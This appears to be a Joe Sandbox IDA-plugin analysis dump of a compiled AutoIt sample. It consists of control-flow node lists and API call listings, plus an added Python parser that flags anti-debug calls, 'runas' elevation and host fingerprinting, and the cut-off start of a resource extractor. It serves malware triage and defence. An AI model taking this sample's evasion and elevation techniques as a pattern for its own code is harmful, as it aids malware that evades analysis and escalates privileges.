101892 370d13 timeGetTime 101892->101945 101893 3a581f WaitForSingleObject 101895 3a583c GetExitCodeProcess CloseHandle 101893->101895 101893->101945 101931 370f95 101895->101931 101896 370e5f Sleep 101930 370e70 Mailbox 101896->101930 101897 368047 59 API calls 101897->101945 101898 367667 59 API calls 101898->101930 101899 3a5af8 Sleep 101899->101930 101901 380db6 59 API calls Mailbox 101901->101945 101902 36b73c 305 API calls 101902->101945 101904 38049f timeGetTime 101904->101930 101905 370f4e timeGetTime 102986 369e5d 60 API calls 101905->102986 101908 3a5b8f GetExitCodeProcess 101912 3a5bbb CloseHandle 101908->101912 101913 3a5ba5 
WaitForSingleObject 101908->101913 101909 369837 85 API calls 101909->101945 101910 3e5f25 111 API calls 101910->101930 101911 36b7dd 110 API calls 101911->101930 101912->101930 101913->101912 101913->101945 101916 3a5874 101916->101931 101917 3a5078 Sleep 101917->101945 101918 3a5c17 Sleep 101918->101945 101920 367de1 59 API calls 101920->101930 101924 369ea0 305 API calls 101924->101945 101930->101898 101930->101904 101930->101908 101930->101910 101930->101911 101930->101916 101930->101917 101930->101918 101930->101920 101930->101931 101930->101945 102996 3c2408 60 API calls 101930->102996 102997 369e5d 60 API calls 101930->102997 102998 3689b3 69 API calls Mailbox 101930->102998 102999 36b73c 332 API calls 101930->102999 103000 3b64da 60 API calls 101930->103000 103001 3c5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101930->103001 103002 3c3c55 66 API calls Mailbox 101930->103002 101931->101731 101932 3c9e4a 90 API calls 101932->101945 101933 3684c0 69 API calls 101933->101945 101935 369c90 59 API calls Mailbox 101935->101945 101936 3b617e 59 API calls Mailbox 101936->101945 101938 367de1 59 API calls 101938->101945 101939 3689b3 69 API calls 101939->101945 101940 3a55d5 VariantClear 101940->101945 101941 3b6e8f 59 API calls 101941->101945 101942 3a566b VariantClear 101942->101945 101943 3a5419 VariantClear 101943->101945 101944 368cd4 59 API calls Mailbox 101944->101945 101945->101877 101945->101881 101945->101883 101945->101888 101945->101889 101945->101890 101945->101891 101945->101892 101945->101893 101945->101896 101945->101897 101945->101899 101945->101901 101945->101902 101945->101905 101945->101909 101945->101924 101945->101930 101945->101931 101945->101932 101945->101933 101945->101935 101945->101936 101945->101938 101945->101939 101945->101940 101945->101941 101945->101942 101945->101943 101945->101944 102931 36e6a0 101945->102931 102962 36f460 101945->102962 102981 36e420 332 API calls 101945->102981 102982 
36fce0 332 API calls 2 library calls 101945->102982 102983 3631ce IsDialogMessageW GetClassLongW 101945->102983 102990 3e6018 59 API calls 101945->102990 102991 3c9a15 59 API calls Mailbox 101945->102991 102992 3bd4f2 59 API calls 101945->102992 102993 3b60ef 59 API calls 2 library calls 101945->102993 102994 368401 59 API calls 101945->102994 102995 3682df 59 API calls Mailbox 101945->102995 101946->101701 101947->101708 101948->101721 101950 363d3e __write_nolock 101949->101950 101951 367bcc 59 API calls 101950->101951 101955 363ea4 Mailbox 101950->101955 101953 363d70 101951->101953 101961 363da6 Mailbox 101953->101961 102060 3679f2 101953->102060 101954 363e77 101954->101955 101956 367de1 59 API calls 101954->101956 101955->101752 101958 363e98 101956->101958 101957 367de1 59 API calls 101957->101961 101960 363f74 59 API calls 101958->101960 101959 3679f2 59 API calls 101959->101961 101960->101955 101961->101954 101961->101955 101961->101957 101961->101959 101962 363f74 59 API calls 101961->101962 101962->101961 102063 364bb5 101963->102063 101968 364e08 LoadLibraryExW 102073 364b6a 101968->102073 101969 39d8e6 101970 364e4a 84 API calls 101969->101970 101972 39d8ed 101970->101972 101974 364b6a 3 API calls 101972->101974 101976 39d8f5 101974->101976 102099 364f0b 101976->102099 101977 364e2f 101977->101976 101978 364e3b 101977->101978 101980 364e4a 84 API calls 101978->101980 101982 3637d4 101980->101982 101982->101759 101982->101760 101984 39d91c 102107 364ec7 101984->102107 101986 39d929 101988 380db6 Mailbox 59 API calls 101987->101988 101989 3637fb 101988->101989 101989->101773 101991 3684cb 101990->101991 101992 3684f2 101991->101992 102358 3689b3 69 API calls Mailbox 101991->102358 101992->101777 101995 363ef3 101994->101995 101996 363eda 101994->101996 101998 367bcc 59 API calls 101995->101998 101997 368047 59 API calls 101996->101997 101999 363879 101997->101999 101998->101999 102000 382efd 101999->102000 102001 382f09 102000->102001 102002 382f7e 
102000->102002 102004 382f2e 102001->102004 102359 388b28 58 API calls __getptd_noexit 102001->102359 102361 382f90 60 API calls 3 library calls 102002->102361 102004->101798 102006 382f8b 102006->101798 102007 382f15 102360 388db6 9 API calls __wsopen_nolock 102007->102360 102009 382f20 102009->101798 102011 39f17c 102010->102011 102017 368ef7 102010->102017 102011->102017 102363 368bdb 59 API calls Mailbox 102011->102363 102013 369040 102362 369d3c 60 API calls Mailbox 102013->102362 102014 368ff8 102015 380db6 Mailbox 59 API calls 102014->102015 102018 368fff 102015->102018 102017->102013 102017->102014 102017->102018 102018->101826 102020 364ee5 85 API calls 102019->102020 102021 3c95ca 102020->102021 102364 3c9734 102021->102364 102024 364f0b 74 API calls 102025 3c95f7 102024->102025 102026 364f0b 74 API calls 102025->102026 102027 3c9607 102026->102027 102028 364f0b 74 API calls 102027->102028 102029 3c9622 102028->102029 102030 364f0b 74 API calls 102029->102030 102031 3c963d 102030->102031 102032 364ee5 85 API calls 102031->102032 102033 3c9654 102032->102033 102034 38571c __crtGetStringTypeA_stat 58 API calls 102033->102034 102035 3c965b 102034->102035 102036 38571c __crtGetStringTypeA_stat 58 API calls 102035->102036 102037 3c9665 102036->102037 102038 364f0b 74 API calls 102037->102038 102039 3c9679 102038->102039 102040 3c9109 GetSystemTimeAsFileTime 102039->102040 102041 3c968c 102040->102041 102042 3c96b6 102041->102042 102043 3c96a1 102041->102043 102045 3c96bc 102042->102045 102046 3c971b 102042->102046 102044 382d55 _free 58 API calls 102043->102044 102049 3c96a7 102044->102049 102370 3c8b06 116 API calls __fcloseall 102045->102370 102048 382d55 _free 58 API calls 102046->102048 102051 39d186 102048->102051 102052 382d55 _free 58 API calls 102049->102052 102050 3c9713 102053 382d55 _free 58 API calls 102050->102053 102051->101763 102054 364e4a 102051->102054 102052->102051 102053->102051 102055 364e54 102054->102055 102057 364e5b 102054->102057 
102371 3853a6 102055->102371 102058 364e6a 102057->102058 102059 364e7b FreeLibrary 102057->102059 102058->101763 102059->102058 102061 367e4f 59 API calls 102060->102061 102062 3679fd 102061->102062 102062->101953 102112 364c03 102063->102112 102066 364c03 2 API calls 102069 364bdc 102066->102069 102067 364bf5 102070 38525b 102067->102070 102068 364bec FreeLibrary 102068->102067 102069->102067 102069->102068 102116 385270 102070->102116 102072 364dfc 102072->101968 102072->101969 102276 364c36 102073->102276 102076 364b8f 102078 364ba1 FreeLibrary 102076->102078 102079 364baa 102076->102079 102077 364c36 2 API calls 102077->102076 102078->102079 102080 364c70 102079->102080 102081 380db6 Mailbox 59 API calls 102080->102081 102082 364c85 102081->102082 102083 36522e 59 API calls 102082->102083 102084 364c91 _memmove 102083->102084 102085 364ccc 102084->102085 102086 364dc1 102084->102086 102087 364d89 102084->102087 102088 364ec7 69 API calls 102085->102088 102291 3c991b 95 API calls 102086->102291 102280 364e89 CreateStreamOnHGlobal 102087->102280 102094 364cd5 102088->102094 102091 364f0b 74 API calls 102091->102094 102092 364d69 102092->101977 102094->102091 102094->102092 102095 39d8a7 102094->102095 102286 364ee5 102094->102286 102096 364ee5 85 API calls 102095->102096 102097 39d8bb 102096->102097 102098 364f0b 74 API calls 102097->102098 102098->102092 102100 364f1d 102099->102100 102103 39d9cd 102099->102103 102315 3855e2 102100->102315 102104 3c9109 102335 3c8f5f 102104->102335 102106 3c911f 102106->101984 102108 364ed6 102107->102108 102109 39d990 102107->102109 102340 385c60 102108->102340 102111 364ede 102111->101986 102113 364bd0 102112->102113 102114 364c0c LoadLibraryA 102112->102114 102113->102066 102113->102069 102114->102113 102115 364c1d GetProcAddress 102114->102115 102115->102113 102119 38527c __ioinit 102116->102119 102117 38528f 102165 388b28 58 API calls __getptd_noexit 102117->102165 102119->102117 102121 3852c0 102119->102121 102120 385294 
102166 388db6 9 API calls __wsopen_nolock 102120->102166 102135 3904e8 102121->102135 102124 3852c5 102125 3852db 102124->102125 102126 3852ce 102124->102126 102128 385305 102125->102128 102129 3852e5 102125->102129 102167 388b28 58 API calls __getptd_noexit 102126->102167 102150 390607 102128->102150 102168 388b28 58 API calls __getptd_noexit 102129->102168 102130 38529f __ioinit @_EH4_CallFilterFunc@8 102130->102072 102136 3904f4 __ioinit 102135->102136 102137 389c0b __lock 58 API calls 102136->102137 102147 390502 102137->102147 102138 390576 102170 3905fe 102138->102170 102139 39057d 102175 38881d 58 API calls 2 library calls 102139->102175 102142 3905f3 __ioinit 102142->102124 102143 390584 102143->102138 102176 389e2b InitializeCriticalSectionAndSpinCount 102143->102176 102146 389c93 __mtinitlocknum 58 API calls 102146->102147 102147->102138 102147->102139 102147->102146 102173 386c50 59 API calls __lock 102147->102173 102174 386cba LeaveCriticalSection LeaveCriticalSection _doexit 102147->102174 102148 3905aa EnterCriticalSection 102148->102138 102159 390627 __wopenfile 102150->102159 102151 390641 102181 388b28 58 API calls __getptd_noexit 102151->102181 102153 3907fc 102153->102151 102157 39085f 102153->102157 102154 390646 102182 388db6 9 API calls __wsopen_nolock 102154->102182 102156 385310 102169 385332 LeaveCriticalSection LeaveCriticalSection _fprintf 102156->102169 102178 3985a1 102157->102178 102159->102151 102159->102153 102159->102159 102183 3837cb 60 API calls 2 library calls 102159->102183 102161 3907f5 102161->102153 102184 3837cb 60 API calls 2 library calls 102161->102184 102163 390814 102163->102153 102185 3837cb 60 API calls 2 library calls 102163->102185 102165->102120 102166->102130 102167->102130 102168->102130 102169->102130 102177 389d75 LeaveCriticalSection 102170->102177 102172 390605 102172->102142 102173->102147 102174->102147 102175->102143 102176->102148 102177->102172 102186 397d85 102178->102186 102180 3985ba 102180->102156 
102181->102154 102182->102156 102183->102161 102184->102163 102185->102153 102189 397d91 __ioinit 102186->102189 102187 397da7 102273 388b28 58 API calls __getptd_noexit 102187->102273 102189->102187 102191 397ddd 102189->102191 102190 397dac 102274 388db6 9 API calls __wsopen_nolock 102190->102274 102197 397e4e 102191->102197 102194 397df9 102275 397e22 LeaveCriticalSection __unlock_fhandle 102194->102275 102195 397db6 __ioinit 102195->102180 102198 397e6e 102197->102198 102199 3844ea __wsopen_nolock 58 API calls 102198->102199 102203 397e8a 102199->102203 102200 397fc1 102201 388dc6 __invoke_watson 8 API calls 102200->102201 102202 3985a0 102201->102202 102204 397d85 __wsopen_helper 103 API calls 102202->102204 102203->102200 102205 397ec4 102203->102205 102212 397ee7 102203->102212 102206 3985ba 102204->102206 102207 388af4 __wsopen_nolock 58 API calls 102205->102207 102206->102194 102208 397ec9 102207->102208 102209 388b28 __wsopen_nolock 58 API calls 102208->102209 102210 397ed6 102209->102210 102213 388db6 __wsopen_nolock 9 API calls 102210->102213 102211 397fa5 102214 388af4 __wsopen_nolock 58 API calls 102211->102214 102212->102211 102219 397f83 102212->102219 102215 397ee0 102213->102215 102216 397faa 102214->102216 102215->102194 102217 388b28 __wsopen_nolock 58 API calls 102216->102217 102218 397fb7 102217->102218 102220 388db6 __wsopen_nolock 9 API calls 102218->102220 102221 38d294 __alloc_osfhnd 61 API calls 102219->102221 102220->102200 102222 398051 102221->102222 102223 39805b 102222->102223 102224 39807e 102222->102224 102226 388af4 __wsopen_nolock 58 API calls 102223->102226 102225 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102224->102225 102236 3980a0 102225->102236 102227 398060 102226->102227 102229 388b28 __wsopen_nolock 58 API calls 102227->102229 102228 39811e GetFileType 102231 398129 GetLastError 102228->102231 102232 39816b 102228->102232 102230 39806a 102229->102230 102234 388b28 __wsopen_nolock 58 API calls 
102230->102234 102235 388b07 __dosmaperr 58 API calls 102231->102235 102243 38d52a __set_osfhnd 59 API calls 102232->102243 102233 3980ec GetLastError 102237 388b07 __dosmaperr 58 API calls 102233->102237 102234->102215 102238 398150 CloseHandle 102235->102238 102236->102228 102236->102233 102239 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102236->102239 102240 398111 102237->102240 102238->102240 102241 39815e 102238->102241 102242 3980e1 102239->102242 102244 388b28 __wsopen_nolock 58 API calls 102240->102244 102245 388b28 __wsopen_nolock 58 API calls 102241->102245 102242->102228 102242->102233 102248 398189 102243->102248 102244->102200 102246 398163 102245->102246 102246->102240 102247 398344 102247->102200 102250 398517 CloseHandle 102247->102250 102248->102247 102249 3918c1 __lseeki64_nolock 60 API calls 102248->102249 102263 39820a 102248->102263 102251 3981f3 102249->102251 102252 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102250->102252 102254 388af4 __wsopen_nolock 58 API calls 102251->102254 102257 398212 102251->102257 102253 39853e 102252->102253 102255 398546 GetLastError 102253->102255 102264 3983ce 102253->102264 102254->102263 102256 388b07 __dosmaperr 58 API calls 102255->102256 102258 398552 102256->102258 102259 390add __close_nolock 61 API calls 102257->102259 102260 390e5b 70 API calls __read_nolock 102257->102260 102261 3997a2 __chsize_nolock 82 API calls 102257->102261 102257->102263 102266 3983c1 102257->102266 102269 3983aa 102257->102269 102271 3918c1 60 API calls __lseeki64_nolock 102257->102271 102262 38d43d __free_osfhnd 59 API calls 102258->102262 102259->102257 102260->102257 102261->102257 102262->102264 102263->102247 102263->102257 102265 38d886 __write 78 API calls 102263->102265 102268 3918c1 60 API calls __lseeki64_nolock 102263->102268 102264->102200 102265->102263 102267 390add __close_nolock 61 API calls 102266->102267 102270 3983c8 102267->102270 102268->102263 102269->102247 
102272 388b28 __wsopen_nolock 58 API calls 102270->102272 102271->102257 102272->102264 102273->102190 102274->102195 102275->102195 102277 364b83 102276->102277 102278 364c3f LoadLibraryA 102276->102278 102277->102076 102277->102077 102278->102277 102279 364c50 GetProcAddress 102278->102279 102279->102277 102281 364ea3 FindResourceExW 102280->102281 102285 364ec0 102280->102285 102282 39d933 LoadResource 102281->102282 102281->102285 102283 39d948 SizeofResource 102282->102283 102282->102285 102284 39d95c LockResource 102283->102284 102283->102285 102284->102285 102285->102085 102287 364ef4 102286->102287 102290 39d9ab 102286->102290 102292 38584d 102287->102292 102289 364f02 102289->102094 102291->102085 102294 385859 __ioinit 102292->102294 102293 38586b 102305 388b28 58 API calls __getptd_noexit 102293->102305 102294->102293 102296 385891 102294->102296 102307 386c11 102296->102307 102297 385870 102306 388db6 9 API calls __wsopen_nolock 102297->102306 102299 385897 102313 3857be 83 API calls 5 library calls 102299->102313 102302 3858a6 102314 3858c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102302->102314 102304 38587b __ioinit 102304->102289 102305->102297 102306->102304 102308 386c21 102307->102308 102309 386c43 EnterCriticalSection 102307->102309 102308->102309 102310 386c29 102308->102310 102311 386c39 102309->102311 102312 389c0b __lock 58 API calls 102310->102312 102311->102299 102312->102311 102313->102302 102314->102304 102318 3855fd 102315->102318 102317 364f2e 102317->102104 102319 385609 __ioinit 102318->102319 102320 38564c 102319->102320 102321 38561f _memset 102319->102321 102322 385644 __ioinit 102319->102322 102323 386c11 __lock_file 59 API calls 102320->102323 102331 388b28 58 API calls __getptd_noexit 102321->102331 102322->102317 102325 385652 102323->102325 102333 38541d 72 API calls 6 library calls 102325->102333 102326 385639 102332 388db6 9 API calls __wsopen_nolock 102326->102332 102329 385668 102334 385686 LeaveCriticalSection 
control_flow_graph (continuation of the IDA plugin's node/edge list; the rendered graph is not reproduced). Windows API calls reached through this graph: GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, WriteFile, GetLastError, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteConsoleW, CreateFileW, CloseHandle, GetLongPathNameW, ReadFile, SetFilePointerEx, SetCurrentDirectoryW, GetStringTypeW, CharUpperBuffW, GetFileAttributesW, FindFirstFileW, FindClose; the remaining nodes are CRT internals (__lock_file, __getptd_noexit, __wsopen_nolock, __write_nolock, _fprintf, _free, _memmove).

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00363B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                              • Part of subcall function 0037092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00417770,00000010), ref: 0039D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,004252F8,?,?,?), ref: 0039D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00414260,004252F8,?,?,?), ref: 0039D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0039D346
                                                              • Part of subcall function 00363A46: GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                              • Part of subcall function 00363A46: LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(00000063), ref: 00363A76
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(000000A4), ref: 00363A88
                                                              • Part of subcall function 00363A46: LoadIconW.USER32(000000A2), ref: 00363A9A
                                                              • Part of subcall function 00363A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                              • Part of subcall function 00363A46: RegisterClassExW.USER32(?), ref: 00363B16
                                                              • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                              • Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                              • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                              • Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                              • Part of subcall function 0036434A: _memset.LIBCMT ref: 00364370
                                                              • Part of subcall function 0036434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%?
                                                            • API String ID: 529118366-505933256
                                                            • Opcode ID: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                            • Instruction ID: 84c90862d69b1908313bcc720b2043c86ee5caf731bdb4c51ecfe2706ff1c8f0
                                                            • Opcode Fuzzy Hash: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
                                                            • Instruction Fuzzy Hash: B5510730A08148EECF23EBB4EC46AFD7B78AB45300F90C1A5F451AA1E5CBB45642CB34
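The "APIs" block above is the Joe Sandbox IDA plugin's per-function call summary, and a few of its lines carry the triage signal: IsDebuggerPresent at 00363B7A is an anti-debug check, the "runas" string reported among the arguments at 0039D33F immediately before the ShellExecuteW call at 0039D346 is consistent with a relaunch through the ShellExecute elevation verb (a UAC prompt), Shell_NotifyIconW creates the tray icon the AutoIt runtime normally shows, and MessageBoxA carries the standard "third-party compiled AutoIt script" text. The Python below is an added example, not part of this report or of Joe Sandbox: it parses lines in the plugin's bullet format into records and tags the notable call sites. The sample lines are copied from the listing above; the tag mapping is the example's own heuristic, not the sandbox's signature logic.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Sample input: bullet lines copied from the "APIs" listing of this report. The
# Joe Sandbox IDA plugin prints one line per call site:
#   "• API.MODULE(args), ref: ADDR"                                direct call
#   "• Part of subcall function ADDR: API.MODULE(args), ref: ADDR" nested call
SAMPLE_LISTING = """\
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
• IsDebuggerPresent.KERNEL32 ref: 00363B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
  • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
• SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00417770,00000010), ref: 0039D281
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00414260,004252F8,?,?,?), ref: 0039D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0039D346
  • Part of subcall function 0036434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
"""

_LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"  # argument text as printed, if any
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Optional[str]    # raw argument text; None when the plugin printed none
    ref: str               # call-site address
    parent: Optional[str]  # subcall function address; None for a direct call


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse the bullets of an 'APIs' block; lines in another format are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        parent = m["parent"].upper() if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], m["args"], m["ref"].upper(), parent))
    return calls


# Triage tags. This mapping is the example's own heuristic (an assumption), not
# Joe Sandbox's signature set; extend it to taste.
API_TAGS: Dict[str, str] = {
    "IsDebuggerPresent": "anti-debug",
    "ShellExecuteW": "process-launch",
    "Shell_NotifyIconW": "tray-icon",
    "GetVersionExW": "host-fingerprint",
    "IsWow64Process": "host-fingerprint",
    "GetNativeSystemInfo": "host-fingerprint",
}
# Exact argument tokens worth flagging: "runas" is the ShellExecute verb that
# requests elevation (a UAC prompt). Token match avoids substring false hits.
ARG_TAGS: Dict[str, str] = {"runas": "uac-elevation-verb"}


@dataclass(frozen=True)
class Indicator:
    tag: str
    api: str
    ref: str


def flag_indicators(calls: List[ApiCall]) -> List[Indicator]:
    """Return one Indicator per (call site, matched rule), in listing order."""
    found: List[Indicator] = []
    for c in calls:
        if c.api in API_TAGS:
            found.append(Indicator(API_TAGS[c.api], c.api, c.ref))
        tokens = c.args.split(",") if c.args else []
        for token, tag in ARG_TAGS.items():
            if token in tokens:
                found.append(Indicator(tag, c.api, c.ref))
    return found


def summarize(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """tag -> sorted, de-duplicated call-site addresses, for a triage note."""
    out: Dict[str, set] = {}
    for ind in flag_indicators(calls):
        out.setdefault(ind.tag, set()).add(ind.ref)
    return {tag: sorted(refs) for tag, refs in out.items()}


if __name__ == "__main__":
    for ind in flag_indicators(parse_api_listing(SAMPLE_LISTING)):
        print(f"{ind.ref}  {ind.api:<20} {ind.tag}")
```

The same bullet format repeats for every function in the report, so feeding each "APIs" block through `parse_api_listing` gives one indicator table per function; the host-fingerprint tags are there for the GetVersionExW / IsWow64Process / GetNativeSystemInfo chain that the graph of the function at 003649A0 further down contains.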

                                                            Control-flow Graph (rendered graph not preserved in this extraction): function at 0x3649A0; its basic blocks call GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo (see APIs below).
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 003649CD
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • GetCurrentProcess.KERNEL32(?,003EFAEC,00000000,00000000,?), ref: 00364A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00364AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00364AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00364AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00364B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00364B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                            • Instruction ID: f70a066286bf5b8991631b3e79af4961e3aaf7cfa638d73ce7166b51439a9d26
                                                            • Opcode Fuzzy Hash: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
                                                            • Instruction Fuzzy Hash: BD91C63198D7C4DECB33DBA8C5511AAFFF5AF2A300B448AADD0CB97A45D220E548C759

                                                            Control-flow Graph (rendered graph not preserved in this extraction): function at 0x364E89; its basic blocks call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource, with every failure branch returning to the common exit block at 0x364EC0 (see APIs below).
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00364D8E,?,?,00000000,00000000), ref: 00364E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00364D8E,?,?,00000000,00000000), ref: 00364EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D94C
                                                            • LockResource.KERNEL32(00364D8E,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F,00000000), ref: 0039D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                            • Instruction ID: 49d91c74f0c587d362949b36e1b0b018ed2ebd59c3986e4b33397a42596ecd6f
                                                            • Opcode Fuzzy Hash: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
                                                            • Instruction Fuzzy Hash: 37115175640741BFD7228B65EC48F677BBDFBC6711F108668F5159A190DBA1EC008660
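The function above is the AutoIt runtime's standard script loader: FindResourceExW is called with type 0x0A (RT_RCDATA) and the name SCRIPT, the resource is loaded, sized and locked, and its bytes are copied into the stream created by CreateStreamOnHGlobal. This is what backs the report's "Binary is likely a compiled AutoIt script file" signature, together with the marker string "This is a third-party compiled AutoIt script." seen in the function at 0x360000+ above. The same lookup can be done offline against the file on disk to pull the embedded script blob out for further analysis. The following is an added example written for this page, not code from Joe Sandbox, AutoIt or the sample: it walks the PE resource directory by hand (no pefile dependency), returns the raw RT_RCDATA/SCRIPT bytes exactly as LockResource would expose them, and checks for the marker string in ASCII or UTF-16LE. It builds its own minimal test PE (a constructed input, not a real AutoIt binary) so it runs stand-alone; decoding the AutoIt script container itself is out of scope here.

```python
import struct

RT_RCDATA = 10                                   # resource type passed to FindResourceExW above
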